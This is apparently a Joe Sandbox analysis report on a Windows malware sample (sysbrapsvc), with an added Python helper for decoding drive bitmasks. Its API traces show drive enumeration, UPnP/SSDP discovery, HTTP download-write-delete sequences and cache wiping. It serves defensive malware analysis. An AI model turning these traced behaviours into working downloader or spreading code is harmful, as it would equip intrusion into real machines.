                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1447977647-3252725368
                                                                                • Opcode ID: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction ID: 9050299abbe0a346d3081233791c3133021d614aeebffb5e53434d9287984c88
                                                                                • Opcode Fuzzy Hash: b1bb112d4c90ed658366957cc38dd4aa79e2f5495822f89f5b4a7354217b67c4
                                                                                • Instruction Fuzzy Hash: 30310DB4C00218DFCB50DF95DC88BEDBBB4FB48304F1085AAE609B6290D7795A84CF5A
                                                                                APIs
                                                                                • GetLogicalDrives.KERNEL32 ref: 00406346
                                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406394
                                                                                • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 004063C1
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004063DE
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406387
                                                                                • NoDrives, xrefs: 004063B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                • API String ID: 2666887985-3471754645
                                                                                • Opcode ID: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction ID: 85ff322c7a95afac5eb7bad71570108e7de378f82f6edd769b1cbb34207a952c
                                                                                • Opcode Fuzzy Hash: 46903cfc04ebe2d267c9076d905ed80b260209c2cd6c3f03203de3a9be594a56
                                                                                • Instruction Fuzzy Hash: 7F11D071E40209DBDB10CFD0D946BEEBBB4FB08704F108159E915B7280D7B8A655CF95
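The function at 00406346 calls GetLogicalDrives and then opens HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer with KEY_READ (00020019) to query the 4-byte NoDrives value. Both are 26-bit masks with bit 0 = A: and bit 25 = Z:; GetLogicalDrives sets a bit for each drive letter present, and NoDrives sets a bit for each letter the Explorer policy hides. The example below is added here to decode those masks and is not code from the sample or from Joe Sandbox; the report only shows the two calls, so combining the masks with AND-NOT (present drives not hidden by policy) is an assumption about what the sample does with them. The mask values in the usage are constructed, and `host_masks` reads the same two values live on a Windows host so a practitioner can see what the sample would have seen there.

```python
r"""Decode the two 26-bit drive masks read by the function at 00406346:
GetLogicalDrives() (bit n set = drive letter n exists) and the REG_DWORD
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
(bit n set = Explorer hides drive letter n). Added example; the report shows
only the calls, so AND-NOT of the two masks is an assumption about the sample.
"""
import sys
from typing import Iterable, List, Optional, Tuple

LETTER_MASK = (1 << 26) - 1  # bits 0..25 = A: .. Z:, the layout both values share
POLICY_KEY = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"


def mask_to_letters(mask: int) -> List[str]:
    """0x4 -> ['C:'], 0x1C -> ['C:', 'D:', 'E:']."""
    return [f"{chr(ord('A') + bit)}:" for bit in range(26) if mask & (1 << bit)]


def letters_to_mask(letters: Iterable[str]) -> int:
    """Inverse of mask_to_letters; accepts 'C', 'c:' or 'C:\\'."""
    mask = 0
    for letter in letters:
        idx = ord(letter[0].upper()) - ord("A")
        if not 0 <= idx < 26:
            raise ValueError(f"not a drive letter: {letter!r}")
        mask |= 1 << idx
    return mask


def candidate_drives(logical_drives: int, no_drives: int = 0) -> List[str]:
    """Drives present on the host that the NoDrives policy does not hide (assumed use)."""
    return mask_to_letters(logical_drives & ~no_drives & LETTER_MASK)


def hidden_by_policy(logical_drives: int, no_drives: int) -> List[str]:
    """Present drives that Explorer hides; useful when reviewing a host's policy."""
    return mask_to_letters(logical_drives & no_drives & LETTER_MASK)


def host_masks() -> Optional[Tuple[int, int]]:
    """Read the same two values the sample reads, on a Windows host (None elsewhere)."""
    if sys.platform != "win32":
        return None
    import ctypes
    import winreg
    logical = ctypes.windll.kernel32.GetLogicalDrives()
    no_drives = 0
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POLICY_KEY, 0, winreg.KEY_READ) as key:
            no_drives, _ = winreg.QueryValueEx(key, "NoDrives")
    except OSError:
        pass  # key or value absent: no policy, nothing hidden
    return logical, no_drives


if __name__ == "__main__":
    # Constructed values: host has C:, D:, E:; policy hides E: (bit 4 = 0x10).
    present = letters_to_mask("CDE")
    print("candidates:", candidate_drives(present, 0x10))
    print("hidden:", hidden_by_policy(present, 0x10))
    live = host_masks()
    if live:
        print("this host:", candidate_drives(*live), "hidden:", hidden_by_policy(*live))
```

NoDrives only affects what Explorer displays; it does not remove a drive letter from GetLogicalDrives, which is why the two values have to be combined rather than read in isolation.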
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D634
                                                                                  • Part of subcall function 0040D700: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D740
                                                                                  • Part of subcall function 0040D700: CloseHandle.KERNEL32(?), ref: 0040D759
                                                                                • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D68F
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D6CC
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D6D7
                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 0040D6DE
                                                                                • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D6F2
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 2251373460-0
                                                                                • Opcode ID: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction ID: f472e5e68ab63b0dd33345cd9092821366bebf82f5afbdb011aebb5a24a45ce9
                                                                                • Opcode Fuzzy Hash: df6a6ebe43e350ee9e2e3ef0cc0677f8426168fd7d8f62afba8d156cc08b655c
                                                                                • Instruction Fuzzy Hash: 5D310A74A00208EFDB04DF98D889B9EBBB5FF49308F0085A9E905A7390D775EA95CF54
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl_aullshr
                                                                                • String ID:
                                                                                • API String ID: 673498613-0
                                                                                • Opcode ID: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction ID: 0b1db91c5ce03941f8675f6ecb7f2ec56fce17a7f2d6269111b0fb586e4650a4
                                                                                • Opcode Fuzzy Hash: 9155782f3457772601139595953a0e4fee1c65b8433155f9dc873cd430b809bd
                                                                                • Instruction Fuzzy Hash: 27111F326005186B8B10EF9EC48268ABBD6EF84361B15C136FC2CDF359D634E9414BD4
                                                                                APIs
                                                                                • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                • htons.WS2_32(?), ref: 00401281
                                                                                • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                • String ID: pdu
                                                                                • API String ID: 2164660128-2320407122
                                                                                • Opcode ID: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
                                                                                • Instruction ID: 1b6d4435c5f8e1f149c0fb86e6a0c1a3006a9f031597685944d6c13f048a50c8
                                                                                • Opcode Fuzzy Hash: 7072d3894e9b5df0fcc29a717805562125ff7a0b34c599f89603ca4f9de7a5ac
                                                                                • Instruction Fuzzy Hash: E931B2362083009BC710DF69D884A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                APIs
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                  • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                  • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                  • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1565192171.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.1565173968.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000004.00000002.1565225349.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                • String ID:
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(0041AC50,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B0C8
                                                                                • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B0E9
                                                                                • FlushFileBuffers.KERNEL32(000000FF), ref: 0040B0F3
                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040B0FD
                                                                                • InterlockedExchange.KERNEL32(00419828,0000003D), ref: 0040B10A
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                • String ID:
                                                                                APIs
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _allshl
                                                                                • String ID:
                                                                                APIs
                                                                                • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401346
                                                                                • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 00401352
                                                                                • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DA0D,00000000), ref: 0040135C
                                                                                  • Part of subcall function 0040A660: HeapFree.KERNEL32(00000000,00000000,00402612,?,00402612,?), ref: 0040A6BB
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                • String ID: pdu
                                                                                APIs
                                                                                • GetDriveTypeW.KERNEL32(0040629F), ref: 004062CD
                                                                                • QueryDosDeviceW.KERNEL32(0040629F,?,00000208), ref: 0040630C
                                                                                • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406324
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeviceDriveQueryType
                                                                                • String ID: \??\
                                                                                APIs
                                                                                • ioctlsocket.WS2_32 ref: 0040112B
                                                                                • recvfrom.WS2_32 ref: 0040119C
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                • String ID:
                                                                                APIs
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                • String ID:
                                                                                APIs
                                                                                • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                                                                • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                                                                • Sleep.KERNEL32(000003E8), ref: 00407361
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CacheDeleteEntry$Sleep
                                                                                • String ID:
                                                                                APIs
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Recv$ErrorLastSleep
                                                                                • String ID:
                                                                                APIs
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Send$ErrorLastSleep
                                                                                • String ID:
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D8D9
                                                                                • CloseHandle.KERNEL32(?), ref: 0040D908
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D917
                                                                                • DeleteCriticalSection.KERNEL32(?), ref: 0040D924
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                • String ID:
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                • String ID:
                                                                                • API String ID: 2223660684-0
                                                                                • Opcode ID: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction ID: 487697b266744d2b5c3d358b1528705abebcded3db4b06867e0c0ac6ea0c4339
                                                                                • Opcode Fuzzy Hash: 1975e189502b1b2e69aa421ca111548c6a80ae828394947d262874ebca66cfab
                                                                                • Instruction Fuzzy Hash: 4A01F7792423049FC3209F26ED84A9B73F8AF45711F04443EE44693650DB39E401CB28
APIs
• CoInitializeEx.OLE32(00000000,00000002,?,?,00407ECD), ref: 00406F78
• SysAllocString.OLEAUT32(0041AA40), ref: 00406F83
• CoUninitialize.OLE32 ref: 00406FA8
  • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
• SysFreeString.OLEAUT32(00000000), ref: 00406FA2
Similarity
• API ID: String$Free$AllocInitializeUninitialize
APIs
  • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
• SysFreeString.OLEAUT32(00000000), ref: 004071D8
Similarity
• API ID: CreateFreeInstanceString
• String ID: Microsoft Corporation
APIs
  • Part of subcall function 0040E070: memset.NTDLL ref: 0040E098
  • Part of subcall function 0040E070: InternetCrackUrlA.WININET(0040DB49,00000000,10000000,0000003C), ref: 0040E0E8
  • Part of subcall function 0040E070: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E0F8
  • Part of subcall function 0040E070: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E131
  • Part of subcall function 0040E070: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E167
  • Part of subcall function 0040E070: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E18F
  • Part of subcall function 0040E070: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E1D8
  • Part of subcall function 0040E070: InternetCloseHandle.WININET(00000000), ref: 0040E267
  • Part of subcall function 0040DF60: SysAllocString.OLEAUT32(00000000), ref: 0040DF8E
  • Part of subcall function 0040DF60: CoCreateInstance.OLE32(004128F0,00000000,00004401,004128E0,00000000), ref: 0040DFB6
  • Part of subcall function 0040DF60: SysFreeString.OLEAUT32(00000000), ref: 0040E051
• SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
• SysFreeString.OLEAUT32(00000000), ref: 0040DF15
Similarity
• API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
• String ID: %S%S
APIs
• CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407EC8), ref: 0040DAFA
  • Part of subcall function 0040DBC0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DBDA
  • Part of subcall function 0040DBC0: htons.WS2_32(0000076C), ref: 0040DC10
  • Part of subcall function 0040DBC0: inet_addr.WS2_32(239.255.255.250), ref: 0040DC1F
  • Part of subcall function 0040DBC0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DC3D
  • Part of subcall function 0040DBC0: bind.WS2_32(000000FF,?,00000010), ref: 0040DC73
  • Part of subcall function 0040DBC0: lstrlenA.KERNEL32(00411C48,00000000,?,00000010), ref: 0040DC8C
  • Part of subcall function 0040DBC0: sendto.WS2_32(000000FF,00411C48,00000000), ref: 0040DC9B
  • Part of subcall function 0040DBC0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DCB5
  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF0B
  • Part of subcall function 0040DE30: SysFreeString.OLEAUT32(00000000), ref: 0040DF15
Similarity
• API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
• String ID: TCP$UDP
APIs
• EnterCriticalSection.KERNEL32(0041A400,?,00000000,?), ref: 00405E5F
• memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
• memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
• LeaveCriticalSection.KERNEL32(0041A400), ref: 00405F30
Similarity
• API ID: CriticalSectionmemcpy$EnterLeave

Execution Graph

Execution Coverage: 0.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 1470
Total number of Limit Nodes: 1
CreateThread CloseHandle 4934->4936 4935->4703 4936->4935 4938 407300 4936->4938 4937->4920 4939 407371 4938->4939 4940 407311 4938->4940 4941 40737c DeleteUrlCacheEntry 4939->4941 4944 40736f 4939->4944 4943 407320 StrChrA 4940->4943 4940->4944 4947 407344 DeleteUrlCacheEntry 4940->4947 4945 40ef90 64 API calls 4941->4945 4942 40a660 _invalid_parameter 3 API calls 4946 4073a6 4942->4946 4943->4940 4943->4947 4944->4942 4945->4944 4950 40ef90 9 API calls 4947->4950 4951 40f053 InternetOpenUrlW 4950->4951 4952 40f1be InternetCloseHandle Sleep 4950->4952 4953 40f1b1 InternetCloseHandle 4951->4953 4954 40f082 CreateFileW 4951->4954 4955 40f1e5 7 API calls 4952->4955 4956 407359 Sleep 4952->4956 4953->4952 4957 40f0b1 InternetReadFile 4954->4957 4958 40f1a4 CloseHandle 4954->4958 4955->4956 4959 40f274 wsprintfW DeleteFileW Sleep 4955->4959 4956->4940 4960 40f104 CloseHandle wsprintfW DeleteFileW Sleep 4957->4960 4961 40f0d5 4957->4961 4958->4953 4962 40ec70 21 API calls 4959->4962 4978 40ec70 CreateFileW 4960->4978 4961->4960 4963 40f0de WriteFile 4961->4963 4965 40f2b4 4962->4965 4963->4957 4967 40f2f2 DeleteFileW 4965->4967 4968 40f2be Sleep 4965->4968 4967->4956 4971 40ee30 6 API calls 4968->4971 4969 40f197 DeleteFileW 4969->4958 4970 40f15b Sleep 4972 40ee30 6 API calls 4970->4972 4973 40f2d5 4971->4973 4974 40f172 4972->4974 4973->4956 4976 40f2e8 ExitProcess 4973->4976 4975 40f18e 4974->4975 4977 40f186 ExitProcess 4974->4977 4975->4958 4979 40ecb5 CreateFileMappingW 4978->4979 4980 40edca 4978->4980 4981 40edc0 CloseHandle 4979->4981 4982 40ecd6 MapViewOfFile 4979->4982 4983 40edd0 CreateFileW 4980->4983 4992 40ee21 4980->4992 4981->4980 4984 40ecf5 GetFileSize 4982->4984 4985 40edb6 CloseHandle 4982->4985 4986 40edf2 WriteFile CloseHandle 4983->4986 4987 40ee18 4983->4987 4988 40ed11 4984->4988 4989 40edac UnmapViewOfFile 4984->4989 4985->4981 4986->4987 4990 40a660 _invalid_parameter 3 API calls 4987->4990 5000 40cca0 4988->5000 4989->4985 4990->4992 
4992->4969 4992->4970 4994 40c640 7 API calls 4995 40ed60 4994->4995 4995->4989 4996 40ed7d memcmp 4995->4996 4996->4989 4997 40ed99 4996->4997 4998 40a660 _invalid_parameter 3 API calls 4997->4998 4999 40eda2 4998->4999 4999->4989 5001 40c6d0 10 API calls 5000->5001 5002 40ccc4 5001->5002 5002->4989 5002->4994 5004 40dbed htons inet_addr setsockopt 5003->5004 5009 40dd1e 5003->5009 5005 40af30 8 API calls 5004->5005 5006 40dc66 bind lstrlenA sendto ioctlsocket 5005->5006 5012 40dcbb 5006->5012 5009->4485 5010 40dce2 5060 40aff0 shutdown closesocket 5010->5060 5011 40a490 9 API calls 5011->5012 5012->5010 5012->5011 5051 40dd40 5012->5051 5067 40e070 memset InternetCrackUrlA InternetOpenA 5013->5067 5016 40df4e 5016->4485 5018 40a660 _invalid_parameter 3 API calls 5018->5016 5022 40df1b 5022->5018 5025 40df11 SysFreeString 5025->5022 5174 40aef0 inet_addr 5028->5174 5031 40afdd 5036 40e920 5031->5036 5032 40af8c connect 5033 40afa0 getsockname 5032->5033 5034 40afd4 5032->5034 5033->5034 5177 40aff0 shutdown closesocket 5034->5177 5178 40aed0 inet_ntoa 5036->5178 5038 40e936 5039 40cea0 11 API calls 5038->5039 5040 40e955 5039->5040 5046 40db7c 5040->5046 5179 40e9a0 memset InternetCrackUrlA InternetOpenA 5040->5179 5043 40e98c 5045 40a660 _invalid_parameter 3 API calls 5043->5045 5044 40a660 _invalid_parameter 3 API calls 5044->5043 5045->5046 5046->4490 5050 40a784 5047->5050 5048 40a78a 5048->4480 5049 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5049->5050 5050->5048 5050->5049 5059 40dd5c 5051->5059 5052 40de24 5052->5012 5053 40dd78 recvfrom 5054 40dda6 StrCmpNIA 5053->5054 5055 40dd99 Sleep 5053->5055 5056 40ddc5 StrStrIA 5054->5056 5054->5059 5055->5059 5057 40dde6 StrChrA 5056->5057 5056->5059 5061 40cd50 5057->5061 5059->5052 5059->5053 5060->5009 5062 40cd5b 5061->5062 5063 40cd61 lstrlenA 5062->5063 5064 40a450 _invalid_parameter 7 API calls 5062->5064 5065 40cd74 5062->5065 5066 40cd90 memcpy 5062->5066 5063->5062 5063->5065 
5064->5062 5065->5059 5066->5062 5066->5065 5068 40e111 InternetConnectA 5067->5068 5069 40de4a 5067->5069 5070 40e27a InternetCloseHandle 5068->5070 5071 40e14a HttpOpenRequestA 5068->5071 5069->5016 5080 40df60 5069->5080 5070->5069 5072 40e180 HttpSendRequestA 5071->5072 5073 40e26d InternetCloseHandle 5071->5073 5074 40e260 InternetCloseHandle 5072->5074 5076 40e19d 5072->5076 5073->5070 5074->5073 5075 40e1be InternetReadFile 5075->5076 5077 40e1eb 5075->5077 5076->5075 5076->5077 5078 40a490 9 API calls 5076->5078 5077->5074 5079 40e206 memcpy 5078->5079 5079->5076 5109 405630 5080->5109 5083 40de63 5083->5022 5090 40e8d0 5083->5090 5084 40df8a SysAllocString 5085 40dfa1 CoCreateInstance 5084->5085 5086 40e057 5084->5086 5088 40e04d SysFreeString 5085->5088 5089 40dfc6 5085->5089 5087 40a660 _invalid_parameter 3 API calls 5086->5087 5087->5083 5088->5086 5089->5088 5126 40e420 5090->5126 5093 40e2a0 5131 40e6f0 5093->5131 5098 40e850 6 API calls 5099 40e2f7 5098->5099 5105 40dee2 5099->5105 5148 40e510 5099->5148 5102 40e32f 5102->5105 5153 40e3c0 5102->5153 5103 40e510 6 API calls 5103->5102 5105->5025 5106 40cea0 5105->5106 5169 40ce10 5106->5169 5113 40563d 5109->5113 5110 405643 lstrlenA 5110->5113 5115 405656 5110->5115 5112 40a450 _invalid_parameter 7 API calls 5112->5113 5113->5110 5113->5112 5113->5115 5116 40a660 _invalid_parameter 3 API calls 5113->5116 5117 4055d0 5113->5117 5121 405580 5113->5121 5115->5083 5115->5084 5116->5113 5118 4055e7 MultiByteToWideChar 5117->5118 5119 4055da lstrlenA 5117->5119 5120 40560c 5118->5120 5119->5118 5120->5113 5122 40558b 5121->5122 5123 405591 lstrlenA 5122->5123 5124 4055d0 2 API calls 5122->5124 5125 4055c7 5122->5125 5123->5122 5124->5122 5125->5113 5129 40e446 5126->5129 5127 40decd 5127->5022 5127->5093 5128 40e4c3 lstrcmpiW 5128->5129 5130 40e4db SysFreeString 5128->5130 5129->5127 5129->5128 5129->5130 5130->5129 5132 40e716 5131->5132 5133 40e2bb 5132->5133 5134 40e7a3 lstrcmpiW 5132->5134 5133->5105 
5143 40e850 5133->5143 5135 40e823 SysFreeString 5134->5135 5136 40e7b6 5134->5136 5135->5133 5137 40e3c0 2 API calls 5136->5137 5139 40e7c4 5137->5139 5138 40e815 5138->5135 5139->5135 5139->5138 5140 40e7f3 lstrcmpiW 5139->5140 5141 40e805 5140->5141 5142 40e80b SysFreeString 5140->5142 5141->5142 5142->5138 5144 40e3c0 2 API calls 5143->5144 5146 40e86b 5144->5146 5145 40e2d9 5145->5098 5145->5105 5146->5145 5147 40e6f0 6 API calls 5146->5147 5147->5145 5149 40e3c0 2 API calls 5148->5149 5151 40e52b 5149->5151 5150 40e315 5150->5102 5150->5103 5151->5150 5157 40e590 5151->5157 5154 40e3e6 5153->5154 5155 40e3fd 5154->5155 5156 40e420 2 API calls 5154->5156 5155->5105 5156->5155 5159 40e5b6 5157->5159 5158 40e6cd 5158->5150 5159->5158 5160 40e643 lstrcmpiW 5159->5160 5161 40e6c3 SysFreeString 5160->5161 5162 40e656 5160->5162 5161->5158 5163 40e3c0 2 API calls 5162->5163 5165 40e664 5163->5165 5164 40e6b5 5164->5161 5165->5161 5165->5164 5166 40e693 lstrcmpiW 5165->5166 5167 40e6a5 5166->5167 5168 40e6ab SysFreeString 5166->5168 5167->5168 5168->5164 5173 40ce1d 5169->5173 5170 40cdc0 _vscprintf wvsprintfA 5170->5173 5171 40ce38 SysFreeString 5171->5025 5172 40a490 9 API calls 5172->5173 5173->5170 5173->5171 5173->5172 5175 40af1c socket 5174->5175 5176 40af09 gethostbyname 5174->5176 5175->5031 5175->5032 5176->5175 5177->5031 5178->5038 5180 40e977 5179->5180 5181 40ea44 InternetConnectA 5179->5181 